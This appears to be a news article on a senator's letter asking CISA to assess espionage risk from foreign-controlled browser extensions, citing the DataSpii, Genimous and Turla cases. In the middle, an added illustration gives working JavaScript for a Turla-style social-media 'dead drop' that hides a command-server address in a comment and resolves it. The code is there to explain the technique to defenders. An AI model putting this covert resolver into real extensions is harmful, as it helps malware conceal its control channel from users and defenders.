Photo illustration by Jakub Porzycki / NurPhoto via Getty Images
A US senator is calling on the Department of Homeland Security's cybersecurity arm to assess the threat posed by browser extensions made in countries known to conduct espionage against the US.
"I am concerned that the use of overseas-controlled browser extensions by millions of Americans could jeopardize US national security," wrote Senator Ron Wyden, an Oregon Democrat, in a letter to Christopher Krebs, director of DHS's Cybersecurity and Infrastructure Security Agency (CISA). "I am concerned that these browser extensions could allow foreign governments to monitor Americans."
Extensions, also known as plugins and add-ons, provide browser functions that are otherwise not available. Ad blockers, language translators, HTTPS enforcers, grammar checkers, and cursor enhancers are just a few examples of legitimate extensions that can be downloaded either from browser-controlled repositories or from third-party websites.
Unfortunately, extensions have a darker side. Their wide reach and opacity make them an ideal vehicle for software that logs the websites users visit, steals the passwords they enter, and acts as a backdoor through which data passes between users and attacker-controlled servers. Because an extension runs inside the browser with whatever permissions it was granted, it sees page contents and form input that network-level defenses never inspect.
Extensions: A Short, Dirty Story
One of the more extreme examples of this kind of abuse came last year, when Chrome and Firefox extensions were caught logging the browsing history of more than 4 million users and selling it online. People often assume that long, complicated URLs keep outsiders from reaching medical or accounting data, but the systematic collection, dubbed DataSpii, proved that assumption wrong.
Sensitive data captured by the extensions included proprietary information from Apple, Symantec, FireEye, Palo Alto Networks, Trend Micro, Tesla, and Blue Origin. The DataSpii extensions also collected private medical, financial, and social data from individuals. The collection came to light thanks to the persistent and costly work of an independent researcher.
Several other cases of abusive extensions have been documented in earlier reports.
Wyden's letter cites the case of an extension provider based in China, a country that critics say pays hackers and others to steal source code, blueprints, and other proprietary data from foreign rivals. The senator wrote:
For example, my office researched Genimous Technology, a Chinese company that controls a network of web browser extensions used by more than 10 million consumers through a number of shell companies in offshore countries such as Cyprus and the Cayman Islands. Genimous subsidiaries offer dozens of browser extensions that give users some limited, free features such as weather reports or parcel tracking to gain access to users' computers. The very purpose of Genimous' browser extensions is to change users' search engine to one offered by Verizon Media, for which Genimous is paid a fee.
I fear that the use of overseas-controlled browser extensions by millions of Americans could compromise US national security. In particular, I fear these browser extensions could allow foreign governments to monitor Americans.
Neither Genimous nor Verizon immediately responded to a request for comment for this post.
There are at least two documented cases of foreign governments using extensions in espionage hacks. The more advanced of the two came to light in 2017 and involved Firefox extensions used by Turla, a Russian-speaking hacking group that many researchers believe works on behalf of the Kremlin.
One such extension, analyzed by the security company Eset, was disguised as a security feature offered on the website of a fictitious security company. Behind the scenes it acted as a backdoor, connecting infected computers to a Turla command-and-control server that could retrieve stolen data and upload and install new or updated malware.
To cover its tracks, the extension did not contact the server directly. Instead, it consulted the comments section of a post on Britney Spears' Instagram account. By computing a hash of each comment to pick out the one the operators had planted, and then applying a regular expression to that comment, the backdoor could derive the address of its server. Because the only visible traffic went to a popular social network, the bootstrap step looked like ordinary browsing. Bitdefender researchers came across the same Turla campaign using other Firefox extensions.
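To make the "dead drop" technique concrete, here is an added example that is not the Turla extension's code and not Eset's reconstruction of it. It shows both halves of the scheme: the operator plants a comment whose hash lands on an agreed value and whose marker-tagged characters spell out a hidden path, and the backdoor scans the thread, hashes each comment, and extracts the path with a regular expression. The hash function (FNV-1a folded to 0..999), the target value, the zero-width-joiner marker, the shortener host and every comment in the thread are constructed assumptions for this illustration.

```javascript
// Added illustration of a social-media "dead drop" C2 resolver. This is NOT the
// Turla extension's code: hash, target value, markers, host and comments are all
// constructed for the example.

const MARK = '\u200d';                       // zero-width joiner, invisible when rendered (assumed)
const SHORTENER = 'https://short.example/';  // hypothetical URL shortener host
const TARGET = 183;                          // hash value the backdoor looks for (constructed)

// Constructed hash: 32-bit FNV-1a folded into 0..999. The backdoor only needs it to be
// cheap and stable; the operator brute-forces a comment that lands on TARGET.
function commentHash(text) {
  let h = 0x811c9dc5;
  for (const ch of text) {
    h ^= ch.codePointAt(0);
    h = Math.imul(h, 0x01000193) >>> 0;
  }
  return h % 1000;
}

// Operator side: hide each character of `hidden` behind MARK plus a visible '#' or '@',
// interleaved into innocuous cover text so the comment reads as ordinary hashtag spam.
function encodeComment(coverText, hidden) {
  const out = [];
  let i = 0;
  for (const word of coverText.split(' ')) {
    out.push(word);
    if (i < hidden.length) out.push(MARK + (i % 2 ? '@' : '#') + hidden[i++]);
  }
  while (i < hidden.length) out.push(MARK + '#' + hidden[i++]);
  return out.join(' ');
}

// Operator side: append a numeric nonce until the whole comment hashes to `target`.
function plantComment(coverText, hidden, target, maxTries = 1000000) {
  const body = encodeComment(coverText, hidden);
  for (let nonce = 0; nonce < maxTries; nonce++) {
    const candidate = `${body} ${nonce}`;
    if (commentHash(candidate) === target) return candidate;
  }
  throw new Error('no nonce found');
}

// Backdoor side: keep only the characters that directly follow a marker.
const EXTRACT = new RegExp(`${MARK}[#@](\\S)`, 'gu');
function extractPath(comment) {
  return Array.from(comment.matchAll(EXTRACT), m => m[1]).join('');
}

// Backdoor side: scan the public thread, keep comments whose hash matches, and take
// the first one that actually yields a hidden string (a decoy may collide on the hash).
function resolveC2(comments, target = TARGET) {
  for (const c of comments) {
    if (commentHash(c) !== target) continue;
    const path = extractPath(c);
    if (path) return SHORTENER + path;
  }
  return null;
}

// Constructed comment thread: three decoys plus one planted comment.
const HIDDEN_PATH = '2kdhuHX';
const PLANTED = plantComment('so hot make loved me here', HIDDEN_PATH, TARGET);
const SAMPLE_COMMENTS = [
  'love this song!!',
  'first',
  PLANTED,
  'when is the tour coming to Paris',
];

console.log(resolveC2(SAMPLE_COMMENTS)); // https://short.example/2kdhuHX
```

The defender's takeaway is that nothing in the resolver's network traffic names the attacker: the only destinations are a social network and a URL shortener, so blocklists built from known C2 hosts never fire. Detection has to happen at the extension itself, by reviewing what code is installed and what it does with the pages it fetches, not at the perimeter.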
A separate nation-sponsored hack involving extensions occurred in 2018. It used Chrome extensions available in Google's official Chrome Web Store. The security company Netscout believes they stole data such as browser cookies and/or passwords. To lend the extensions a touch of authenticity, the hackers copied reviews from other extensions, both praise and criticism.
Over the years Wyden has pressed both government officials and business leaders on a variety of technology topics. Last year, he and Florida Republican Senator Marco Rubio called on CISA to investigate VPNs, which, like extensions, are capable of gathering sensitive information and doing other nefarious things.
"To that end, I ask you to assess the threat posed by web browser extensions offered and controlled by companies in opposing countries," wrote Wyden. "If you discover that these companies and their products are threatening US national security, please take appropriate steps to protect US government employees and government systems."